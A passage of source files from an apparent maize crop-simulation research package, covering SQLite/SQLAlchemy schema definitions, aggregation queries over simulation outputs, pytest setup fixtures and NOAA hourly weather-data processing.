FOREIGN KEY (site) REFERENCES site_info (site))')
con.execute(
'INSERT INTO new_sims('
'year,'
'cvar,'
'site,'
'run_name,'
'jday,'
'time,'
'date,'
'leaves,'
'leaves_mature,'
'leaves_dropped,'
'LA_perplant,'
'LA_dead,'
'LAI,'
'leaf_wp,'
'temp_soil,'
'temp_air,'
'temp_canopy,'
'ET_dmd,'
'ET_sply,'
'Pn,'
'Pg,'
'resp,'
'av_gs,'
'LAI_sun,'
'LAI_shade,'
'PFD_sun,'
'PFD_shade,'
'An_sun,'
'An_shade,'
'Ag_sun,'
'Ag_shade,'
'gs_sun,'
'gs_shade,'
'VPD,'
'Nitr,'
'N_Dem,'
'NUpt,'
'LeafN,'
'PCRL,'
'DM_total,'
'DM_shoot,'
'DM_ear,'
'DM_leaf,'
'DM_stem,'
'DM_root,'
'AvailW,'
'solubleC,'
'pheno) '
'SELECT '
'year,'
'cvar,'
'site,'
'run_name,'
'jday,'
'time,'
'date,'
'leaves,'
'leaves_mature,'
'leaves_dropped,'
'LA_perplant,'
'LA_dead,'
'LAI,'
'leaf_wp,'
'temp_soil,'
'temp_air,'
'temp_canopy,'
'ET_dmd,'
'ET_sply,'
'Pn,'
'Pg,'
'resp,'
'av_gs,'
'LAI_sun,'
'LAI_shade,'
'PFD_sun,'
'PFD_shade,'
'An_sun,'
'An_shade,'
'Ag_sun,'
'Ag_shade,'
'gs_sun,'
'gs_shade,'
'VPD,'
'Nitr,'
'N_Dem,'
'NUpt,'
'LeafN,'
'PCRL,'
'DM_total,'
'DM_shoot,'
'DM_ear,'
'DM_leaf,'
'DM_stem,'
'DM_root,'
'AvailW,'
'solubleC,'
'pheno '
'FROM sims')
con.execute('DROP TABLE sims')
con.execute('ALTER TABLE new_sims RENAME TO sims')
con.execute('CREATE INDEX id_runame ON sims(run_name)')
con.execute('CREATE INDEX id_year ON sims(year)')
con.execute('CREATE INDEX id_cvar ON sims(cvar)')
con.execute('CREATE INDEX id_site ON sims(site)')
con.execute('CREATE INDEX id_siteyear ON sims(year, site)')
con.execute('CREATE INDEX id_pheno ON sims(pheno)')
```
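A minimal usage sketch (the database path below is hypothetical): `alter_table` rebuilds `sims` so its physical row order follows the composite primary key and then adds the secondary indexes.
```python
# Hypothetical database path; alter_table expects an existing SQLite file
# that already contains the original sims table.
from ideotype.sql_altertable import alter_table

alter_table('/home/user/upscale/db/ideotype.db')
```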
#### File: ideotype/ideotype/sql_declarative.py
```python
from sqlalchemy import (Column, ForeignKey, ForeignKeyConstraint,
Integer, String, Float)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
class IdeotypeBase(object):
"""
Base mixin that adds a readable __repr__ for easier debugging.
"""
def __repr__(self): # magic function __repr__
"""Define standard representation."""
columns = self.__table__.columns.keys()
rep_str = '<' + self.__class__.__name__ + '('
for c in columns:
rep_str += str(getattr(self, c)) + ', ' # getattr
rep_str = rep_str[0:-2]
rep_str += ')>'
return rep_str
# declarative_base is how you define tables
# makes an instance of a declarative_base() object
IdeotypeBase = declarative_base(cls=IdeotypeBase)
class WeaData(IdeotypeBase):
"""
DB table for weather data table.
Parameters
----------
site: String Column
Simulation site.
"""
__tablename__ = 'weadata'
year = Column(Integer, primary_key=True)
site = Column(String(6),
ForeignKey('site_info.site'),
primary_key=True)
jday = Column(Integer, primary_key=True)
time = Column(Integer, primary_key=True)
date = Column(String)
solar = Column(Float)
temp = Column(Float)
precip = Column(Float)
rh = Column(Float)
co2 = Column(Integer)
vpd = Column(Float)
class Sims(IdeotypeBase):
"""
DB table for simulation outputs.
Attributes
----------
run_name: String Column
Run name for batch of simulation experiments. Part of primary key.
cvar: Integer Column
Cultivar number that represents specific param combinations.
site: String Column
Simulation site id.
year: Integer Column
Simulation year.
date: DateTime Column
MAIZSIM simulation output timestep date.
time: Integer Column
MAIZSIM simulation output timestep hour.
"""
__tablename__ = 'sims'
# primary keys
cvar = Column(Integer,
ForeignKey('params.cvar'),
primary_key=True)
year = Column(Integer, primary_key=True)
site = Column(String(6),
ForeignKey('site_info.site'),
primary_key=True)
run_name = Column(String(20),
ForeignKey('params.run_name'),
primary_key=True)
jday = Column(Integer, primary_key=True)
time = Column(Integer, primary_key=True)
__table_args__ = (ForeignKeyConstraint(
['run_name', 'cvar'], ['params.run_name', 'params.cvar']), {})
# other columns
date = Column(String)
leaves = Column(Float)
leaves_mature = Column(Float)
leaves_dropped = Column(Float)
LA_perplant = Column(Float)
LA_dead = Column(Float)
LAI = Column(Float)
leaf_wp = Column(Float)
temp_soil = Column(Float)
temp_air = Column(Float)
temp_canopy = Column(Float)
ET_dmd = Column(Float)
ET_sply = Column(Float)
Pn = Column(Float)
Pg = Column(Float)
resp = Column(Float)
av_gs = Column(Float)
LAI_sun = Column(Float)
LAI_shade = Column(Float)
PFD_sun = Column(Float)
PFD_shade = Column(Float)
An_sun = Column(Float)
An_shade = Column(Float)
Ag_sun = Column(Float)
Ag_shade = Column(Float)
gs_sun = Column(Float)
gs_shade = Column(Float)
VPD = Column(Float)
Nitr = Column(Float)
N_Dem = Column(Float)
NUpt = Column(Float)
LeafN = Column(Float)
PCRL = Column(Float)
DM_total = Column(Float)
DM_shoot = Column(Float)
DM_ear = Column(Float)
DM_leaf = Column(Float)
DM_stem = Column(Float)
DM_root = Column(Float)
AvailW = Column(Float)
solubleC = Column(Float)
pheno = Column(String)
class Params(IdeotypeBase):
"""
DB table for sampled parameter combinations.
Attributes
----------
run_name: String Column
Run name of simulation experiments. Part of primary key.
cvar: Integer Column
Cultivar number that represents specific param combinations.
param: String Column
Perturbed parameter.
value: Float Column
Parameter value.
"""
__tablename__ = 'params'
run_name = Column(String(20), primary_key=True)
cvar = Column(Integer, primary_key=True)
param = Column(String, primary_key=True)
value = Column(Float)
class SiteInfo(IdeotypeBase):
"""
DB table for simulation site info.
Attributes
----------
site : String Column
Simulation site. Primary key.
state : String Column
lat : Float Column
lon : Float Column
years : Integer Column
Years of weather data available at simulation site.
area : Float Column
Area maize planted (#TODO: find unit).
Average value from nearby NASS sites (#TODO: find how many site).
perct_irri : Float Column
Percent irrigated for simulation site.
Average value from nearby NASS sites.
texture : String Column
Soil texture for simulated site.
"""
__tablename__ = 'site_info'
site = Column(String(6), primary_key=True)
state = Column(String(2))
lat = Column(Float)
lon = Column(Float)
years = Column(Integer)
area = Column(Float)
perct_irri = Column(Float)
texture = Column(String(6))
class LogInit(IdeotypeBase):
"""
DB table for log files.
Attributes
----------
run_name: String Column
Run name of simulation experiments.
Primary key.
Foreign key link to Sims and Params table.
init_yml: String Column
init yaml file used for experiment.
path_inits: String Column
Path where inits are stored for experiment.
path_params: String Column
Path where params are stored for experiment.
path_jobs: String Column
Path where jobs are stored for experiment.
path_sims: String Column
Path where sims are stored for experiment.
path_maizsim: String Column
Path pointing to maizsim directory used.
siteyears: String Column
Path pointing to siteyears file used.
site_info: String Column
Path pointing to site_info file used.
site_summary: String Column
Path pointing to site_summary file used.
pdate: String Column
Planting date set for simulations.
version: String Column
ideotype version - git hash.
"""
__tablename__ = 'log_init'
run_name = Column(String,
ForeignKey('params.run_name'),
primary_key=True)
init_yml = Column(String)
path_inits = Column(String)
path_params = Column(String)
path_jobs = Column(String)
path_sims = Column(String)
path_maizsim = Column(String)
siteyears = Column(String)
site_info = Column(String)
site_summary = Column(String)
pdate = Column(String)
version = Column(String)
def create_table(fpath_db):
"""
Create table in engine.
Parameters
----------
fpath_db: str
Path pointing to database.
"""
# create engine to setup database
engine = create_engine('sqlite:///' + fpath_db)
# create all tables in engine
# = 'Create Table' in SQL
# metadata contains all definition of tables
IdeotypeBase.metadata.create_all(engine)
return engine
```
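A short usage sketch, with a hypothetical path: `create_table` builds every table declared on `IdeotypeBase` and returns the engine, which can be inspected to confirm the schema.
```python
# Hypothetical path; inspect() is the standard SQLAlchemy reflection helper.
from sqlalchemy import inspect
from ideotype.sql_declarative import create_table

engine = create_table('/home/user/upscale/db/ideotype.db')
print(inspect(engine).get_table_names())
# expected (order may vary): log_init, params, sims, site_info, weadata
```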
#### File: ideotype/ideotype/sql_query.py
```python
import csv
import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy import func, and_
from sqlalchemy.sql.expression import distinct
from ideotype.sql_declarative import (IdeotypeBase,
WeaData,
Sims,
SiteInfo,
Params)
def query_weadata(fpath_db):
"""
Weather data query.
- Average meteorology at each site.
- Variance of meteorology at each site.
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(WeaData.site.label('site'),
func.avg(WeaData.temp).label('mean_temp'),
func.avg(WeaData.vpd).label('mean_vpd'),
func.sum(WeaData.precip).label('total_precip'),
func.count(WeaData.precip).label('precip_count')
).group_by(WeaData.site)
results = query.all()
# query output as csv
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
with open('testoutput.csv', 'w') as outfile:
outcsv = csv.writer(outfile)
outcsv.writerow(columns)
for row in results:
outcsv.writerow(row)
def query_gseason_climate(fpath_db, phenos):
"""
Query in-season climate.
Climate data queried from maizsim output,
which means there could be slight differences between
the climate conditions each phenotype experiences
due to differences in pdate & phenology.
Parameters
----------
fpath_db : str
phenos : list
List of top phenotype numbers.
Returns
-------
query : sqlalchemy query
results : list
List of query results.
df : pd.DataFrame
DataFrame of queried results.
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.year.label('year'),
Sims.site.label('site'),
Sims.pheno.label('pheno'),
func.avg(Sims.temp_air).label('temp_air'),
func.avg(Sims.temp_canopy).label('temp_can'),
func.avg(Sims.temp_soil).label('temp_soil'),
func.avg(Sims.VPD).label('vpd'),
func.avg(Sims.PFD_sun).label('pfd_sun'),
func.avg(Sims.PFD_shade).label('pfd_shade'),
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_yield(fpath_db, phenos):
"""
Sims query.
- Final yield for each site-year-cvar combination.
- Yield variation across cvars.
- Yield variation across sites.
- Yield variation across years.
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.year.label('year'),
Sims.site.label('site'),
Sims.pheno.label('pheno'),
func.avg(Sims.DM_ear).label('yield'),
SiteInfo.lat.label('lat'),
SiteInfo.lon.label('lon'),
SiteInfo.texture.label('soil_texture'),
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno,
SiteInfo.site).filter(
and_(Sims.pheno == '"Matured"',
Sims.cvar.in_(phenos),
Sims.site == SiteInfo.site,
Sims.cvar == Params.cvar
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_phys(fpath_db, phenos):
"""
Query physiological model outputs during sunlit hours.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.avg(Sims.av_gs).label('gs'),
func.avg(Sims.Pn).label('pn'),
func.avg(Sims.Pg).label('pg'),
func.max(Sims.LAI_sun).label('LAI_sun'),
func.max(Sims.LAI_shade).label('LAI_shade'),
func.avg(Sims.Ag_sun).label('Ag_sun'),
func.avg(Sims.Ag_shade).label('Ag_shade'),
func.avg(Sims.An_sun).label('An_sun'),
func.avg(Sims.An_shade).label('An_shade')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
Sims.PFD_sun > 0
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
# Scale photosynthesis to canopy
df['sun_perct'] = df.LAI_sun/(df.LAI_sun + df.LAI_shade)
df['shade_perct'] = df.LAI_shade/(df.LAI_sun + df.LAI_shade)
df['Ag'] = (df.Ag_sun * df.sun_perct) + (df.Ag_shade * df.shade_perct)
df['An'] = (df.An_sun * df.sun_perct) + (df.An_shade * df.shade_perct)
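# Worked example (illustrative): with LAI_sun = 2.0 and LAI_shade = 1.0,
# sun_perct = 2/3 and shade_perct = 1/3, so An = (2/3)*An_sun + (1/3)*An_shade,
# i.e. an LAI-weighted mean of the sunlit and shaded leaf classes.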
return(query, results, df)
def query_carbon(fpath_db, phenos):
"""
Query mean and total carbon accumulation across phenostage.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.sum(Sims.Pn).label('pn_sum'),
func.sum(Sims.Pg).label('pg_sum'),
func.avg(Sims.Pn).label('pn_mean'),
func.avg(Sims.Pg).label('pg_mean')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_mass(fpath_db, phenos):
"""
Query mass.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.max(Sims.DM_total).label('dm_total'),
func.max(Sims.DM_root).label('dm_root'),
func.max(Sims.DM_shoot).label('dm_shoot'),
func.max(Sims.DM_stem).label('dm_stem'),
func.max(Sims.DM_leaf).label('dm_leaf'),
func.max(Sims.DM_ear).label('dm_ear'),
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos)
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_pheno(fpath_db, phenos):
"""
Query pheno info.
Parameters
----------
fpath_db : str
phenos : list
List of top phenotype numbers.
Returns
-------
query : sqlalchemy query
results : list
List of query results.
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.count(distinct(Sims.jday)).label('pheno_days'),
func.min(Sims.jday).label('jday_start'),
func.min(Sims.date).label('date_start')
).group_by(Sims.cvar,
Sims.site,
Sims.year,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos)
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_leaves(fpath_db, phenos):
"""
Query physiological model outputs.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.max(Sims.LAI).label('LAI'),
func.max(Sims.LA_perplant).label('LA'),
func.max(Sims.leaves).label('leaves'),
func.max(Sims.leaves_mature).label('leaves_mature'),
func.max(Sims.leaves_dropped).label('leaves_dropped')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos)
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_waterstatus(fpath_db, phenos):
"""
Query water status.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.avg(
Sims.ET_sply - Sims.ET_dmd).label(
'water_deficit_mean'),
func.sum(
Sims.ET_sply - Sims.ET_dmd).label(
'water_deficit_sum')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
Sims.time == 12,
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_waterstatus_sum(fpath_db, phenos):
"""
Query water status summed across phenostage.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.sum(
Sims.ET_sply - Sims.ET_dmd).label(
'water_deficit_sum')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_waterpotential(fpath_db, phenos, time):
"""
Query water status.
Parameters
----------
fpath_db : str
phenos : list
time : int
Time to query.
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.avg(Sims.leaf_wp).label('leaf_wp')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
Sims.time == time,
Sims.leaf_wp > -5
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
```
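Illustrative call pattern for these query helpers (the database path and cultivar numbers are made up); each helper returns the SQLAlchemy query object, the raw result rows, and a DataFrame.
```python
# Hypothetical inputs for demonstration only.
from ideotype.sql_query import query_yield, query_pheno

fpath_db = '/home/user/upscale/db/ideotype.db'
phenos = [0, 12, 37]  # example cultivar numbers

query, results, df_yield = query_yield(fpath_db, phenos)
print(df_yield.groupby('cvar')['yield'].mean())

_, _, df_pheno = query_pheno(fpath_db, phenos)
print(df_pheno.head())
```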
#### File: ideotype/tests/test_wflow_setup.py
```python
import os
import pytest
import yaml
from shutil import copyfile
from ideotype.data import DATA_PATH
from ideotype.wflow_setup import (make_dircts,
make_inits, make_cultivars,
make_runs, make_jobs, make_subjobs)
# setup pointer to some default init files
if os.path.expanduser('~/') == '/home/disk/eos8/ach315/':
dirct_default_init = '/home/disk/eos8/ach315/upscale/inits/'
else:
# TODO: think about how to address this
dirct_default_init = os.path.join(DATA_PATH, 'test_data', 'inits')
@pytest.fixture(scope='module')
def make_testyaml(tmp_path_factory):
"""Update init_test.yml file on the fly with tmp_paths."""
# create a temporary base directory for the test project
tmp_path = tmp_path_factory.mktemp('ideotype_test')
# create standard directory structure in the temp directory
# that mirrors the standard project directory
# create the four main directories under the temp project directory
os.mkdir(os.path.join(tmp_path, 'inits'))
os.mkdir(os.path.join(tmp_path, 'jobs'))
os.mkdir(os.path.join(tmp_path, 'runs'))
os.mkdir(os.path.join(tmp_path, 'sims'))
# create secondary directories that need to exist
os.mkdir(os.path.join(tmp_path, 'inits', 'standards'))
os.mkdir(os.path.join(tmp_path, 'inits', 'soils'))
os.mkdir(os.path.join(tmp_path, 'inits', 'cultivars'))
os.mkdir(os.path.join(tmp_path, 'inits', 'customs'))
# /init_standards
dirct_default_standard = os.path.join(dirct_default_init,
'standards',
'opt')
dirct_temp_standard = os.path.join(tmp_path,
'inits',
'standards')
# list of standard init files to copy
fname_standards = ['biology.txt',
'nitrogen.txt',
'drip.txt',
'water.txt',
'waterbound.txt',
'massbl.txt']
# copy all standard init files to temp directory
for fname in fname_standards:
copyfile(
os.path.join(dirct_default_standard, fname),
os.path.join(dirct_temp_standard, fname))
# /init_soils
dirct_default_soil = os.path.join(dirct_default_init,
'soils',
'soils_1')
dirct_temp_soil = os.path.join(tmp_path,
'inits',
'soils')
# list of soil init files to copy
fname_soils = ['grid.txt',
'nod.txt',
'soil.txt',
'solute.txt']
# copy all standard soil files to temp directory
for fname in fname_soils:
copyfile(
os.path.join(dirct_default_soil, fname),
os.path.join(dirct_temp_soil, fname))
# create test_yaml file on the fly for testing purposes
test_yaml = os.path.join(DATA_PATH, 'inits', 'init_test.yml')
updated_yaml = os.path.join(tmp_path, 'init_test.yml')
# check if init_test.yml exists
if not os.path.exists(test_yaml):
raise ValueError(f'{test_yaml} does not exist!')
# read in init_test.yml
with open(test_yaml, 'r') as pfile:
dict_init = yaml.safe_load(pfile)
# update certain paths with tmp_path
dict_init['setup']['path_project'] = str(tmp_path)
dict_init['setup']['path_init_standards'] = dirct_temp_standard
dict_init['setup']['path_init_soils'] = dirct_temp_soil
# write the updated init_test.yml out to the temp directory
with open(updated_yaml, 'w') as outfile:
yaml.dump(dict_init, outfile,
default_flow_style=False, sort_keys=False)
return updated_yaml
def test_make_dircts(make_testyaml):
"""Make test directories under temporary path."""
run_name = 'test'
yamlfile = make_testyaml
make_dircts(run_name,
yamlfile=yamlfile,
cont_years=False,
cont_cvars=False) # make test directories
# code to test directories are correct
def test_make_inits(make_testyaml):
"""Make test init.txt within temp directories."""
run_name = 'test'
yamlfile = make_testyaml
make_inits(run_name,
yamlfile=yamlfile,
cont_cvars=False)
def test_make_cultivars(make_testyaml):
"""Make test cvar.txt within temp directories."""
run_name = 'test'
yamlfile = make_testyaml
make_cultivars(run_name,
yamlfile=yamlfile,
cont_cvars=False)
def test_make_runs(make_testyaml):
"""Make test run.txt within temporary directories."""
run_name = 'test'
yamlfile = make_testyaml
make_runs(run_name,
yamlfile=yamlfile,
cont_cvars=False) # write run.txt files
# code to test that run files are correct
def test_make_jobs(make_testyaml):
"""Make test job.txt within temp directories."""
run_name = 'test'
yamlfile = make_testyaml
make_jobs(run_name,
yamlfile=yamlfile,
cont_years=False,
cont_cvars=False) # write job.txt files
# code to test that job files are correct
def test_make_subjobs(make_testyaml):
"""Make test subjobs.sh within temp directory."""
run_name = 'test'
yamlfile = make_testyaml
make_subjobs(run_name,
yamlfile=yamlfile) # write subjobs.sh
# code to test that subjobs.sh is correct
```
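The tests above can be invoked programmatically as sketched below (the relative path assumes the repository root as the working directory); `pytest.main` is the standard entry point.
```python
import pytest

# Equivalent to running `pytest -v ideotype/tests/test_wflow_setup.py`
pytest.main(['-v', 'ideotype/tests/test_wflow_setup.py'])
```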
#### File: ideotype/ideotype/weafile_process.py
```python
import os
import glob
import yaml
from datetime import datetime
from dateutil import tz
import numpy as np
import pandas as pd
import xarray as xr
from timezonefinder import TimezoneFinder
from ideotype import DATA_PATH
from ideotype.utils import CC_RH, CC_VPD
from ideotype.data_process import read_data
from ideotype.nass_process import nass_summarize
def read_wea(year_start, year_end, climate_treatment=None):
"""
Read in raw hourly weather data.
- Data source: NOAA Integrated Surface Hourly Database
- Link: https://www.ncdc.noaa.gov/isd
- Weather data: temperature, RH, precipitation
- Raw data stored: ~/data/ISH/
- Output csv files stored: ~/upscale/weadata/process/
* note:
For years 1991-2010, only select data from class 1
(refer to NSRDB manual p.7-8 for more details)
- class 1: have complete period of record of 1991-2010.
- class 2: have complete period of record but with
significant periods of interpolated, filler,
or otherwise low-quality input data for solar models.
- class 3: have some gaps in the period of record
but have at least 3 years of data.
Parameters
----------
year_start : int
year_end : int
climate_treatment : int
Create weather data for future climate projections.
2050 or 2100.
"""
# setting up np.read_fwf arguments
colnames = ['time',
'temp', 'temp_quality',
'dew_temp', 'dtemp_quality',
'precip', 'precip_time',
'precip_depth', 'precip_quality',
'precip_perhr', 'rh']
colspecs = [(15, 25), # time
(87, 92), # temp
(92, 93), # temp_quality
(93, 98), # dew_temp
(98, 99), # dtemp_quality
(105, 8193)] # precip string
# Read in relevant file paths
fpaths_wea = os.path.join(DATA_PATH, 'files', 'filepaths_wea.yml')
with open(fpaths_wea) as pfile:
dict_fpaths = yaml.safe_load(pfile)
# Read in info on conversion between WBAN & USAF id numbering system
fpath_id_conversion = os.path.join(
DATA_PATH, 'sites', dict_fpaths['id_conversion'])
df_stations = pd.read_csv(fpath_id_conversion, header=None, dtype=str)
df_stations.columns = ['WBAN', 'USAF']
# Read in stations info
fpath_stations_info = os.path.join(
DATA_PATH, 'sites', dict_fpaths['stations_info'])
df_sites = pd.read_csv(fpath_stations_info)
# Set up basepath
if climate_treatment is None:
basepath = dict_fpaths['basepath']
else:
basepath = f'{dict_fpaths["basepath"]}_f{climate_treatment}'
# Set up years
if year_start == year_end:
years = [year_start]
else:
years = np.arange(year_start, year_end+1)
# Set up date parser for pandas
dateparser = lambda dates: [datetime.strptime(d, '%Y%m%d%H') for d in dates] # noqa
# Loop through years to read in data
for year in years:
print(year) # track progress
# Check first if file exists already
if os.path.isfile(os.path.join(basepath, f'temp_{year}.csv')):
raise ValueError(f'temp_{year}.csv exists!')
# Set up default timeline
season_start = '02-01-'
season_end = '11-30-'
times = pd.date_range(f'{season_start + str(year)}',
f'{season_end + str(year)} 23:00:00',
freq='1H')
arr_temp_sites = np.zeros(shape=(len(times),))
arr_rh_sites = np.zeros(shape=(len(times),))
arr_precip_sites = np.zeros(shape=(len(times),))
# initiate empty list to store all site ids (USAF)
siteid_all = []
# For years 1961-1990
if year < 1991:
fnames = glob.glob(
os.path.join(os.path.expanduser('~'),
'data', 'ISH', str(year), '*'))
# For years 1991-2010
else:
# Select class1 weather station sites
sites = df_sites.query(
'CLASS == 1').reset_index().USAF.astype('str')
# Select sites within specified year that are class1
sites_year = glob.glob(
os.path.join(os.path.expanduser('~'),
'data', 'ISH', str(year), '*'))
sites_year = pd.Series([
site.split('/')[-1].split('-')[0] for site in sites_year])
sites_year = sites_year[
sites_year.isin(sites)].reset_index(drop=True)
# Drop duplicates in sites_year
sites_year.drop_duplicates(keep='first', inplace=True)
fnames = []
for site in sites_year:
fname = glob.glob(os.path.join(os.path.expanduser('~'),
'data', 'ISH',
str(year),
f'{site}-*'))
if len(fname) == 1:
fnames.append(fname[0])
else:
print(f'choose from files: {fname}')
fname = glob.glob(os.path.join(os.path.expanduser('~'),
'data', 'ISH',
str(year),
f'{site}-99999-*'))
fnames.append(fname[0])
for name in fnames:
# site_id
siteid_usaf = name.split('/')[-1].split('-')[0]
siteid_wban = name.split('/')[-1].split('-')[1]
if siteid_usaf == '999999':
siteid_usaf = df_stations.query(
f'WBAN == "{siteid_wban}"').USAF.item()
siteid_all.append(siteid_usaf)
# Read in fixed width weather data
df = pd.read_fwf(name,
names=colnames,
colspecs=colspecs,
header=None,
index_col='time',
encoding='latin_1',
dtype={'temp': int, 'precip': str},
parse_dates=['time'],
date_parser=dateparser)
# Remove duplicated hours, keeping only first occurrence
# keep = 'first': marks duplicate as True
# except for first occurrence
# ~: not selecting for True ends up selecting
# for the non-duplicated indexes
# *** note: can't just use df.index.drop_duplicates() since
# * that only returns a list of the non-duplicated index
# * but you can't just use that to select non-duplicated rows
# * since it will also pick up the duplicated rows
df = df[~df.index.duplicated(keep='first')]
# Add in missing time values
# Correct for leap years
# Filter only for growing season
df = df.reindex(times, fill_value=np.nan)
# Find precip data
df.precip_time = df[
df['precip'].str.find('ADDAA1') != -1]['precip'].str.split(
'ADDAA1').str.get(1).str.slice(0, 2).astype(float)
df.precip_depth = df[
df['precip'].str.find('ADDAA1') != -1]['precip'].str.split(
'ADDAA1').str.get(1).str.slice(2, 6).astype(float)
df.precip_quality = df[
df['precip'].str.find('ADDAA1') != -1]['precip'].str.split(
'ADDAA1').str.get(1).str.slice(7, 8)
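# Illustrative record layout, inferred from the slicing above: within the
# substring that follows 'ADDAA1', characters 0-1 give the accumulation
# period in hours, characters 2-5 the precipitation depth (later divided
# by 10, so presumably recorded in tenths of mm), and character 7 the
# quality flag; e.g. '01000531' -> 1-hr period, depth '0005', quality '1'.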
# Filter out weather data based on quality code (data manual p.26)
# Masking unqualified data with NANs:
# code 3 (Erroneous) &
# code 7 (Erroneous, data originated from an NCEI data source)
# *** temp
quality_temp = (
df.temp_quality == '3') | (df.temp_quality == '7')
rows_temp = df[quality_temp].index
df.loc[rows_temp, 'temp'] = np.nan
# *** dew temp
quality_dtemp = (
df.dtemp_quality == '3') | (df.dtemp_quality == '7')
rows_dtemp = df[quality_dtemp].index
df.loc[rows_dtemp, 'dew_temp'] = np.nan
# *** precip
quality_precip = (
df.precip_quality == '3') | (df.precip_quality == '7')
rows_precip = df[quality_precip].index
df.loc[rows_precip, 'precip'] = np.nan
# Replace missing data with NaN
df.temp = df.temp.replace({9999: np.nan})
df.dew_temp = df.dew_temp.replace({9999: np.nan})
df.precip_time = df.precip_time.replace({99: np.nan})
df.precip_depth = df.precip_depth.replace({9999: np.nan})
# Calculate hourly precip depth
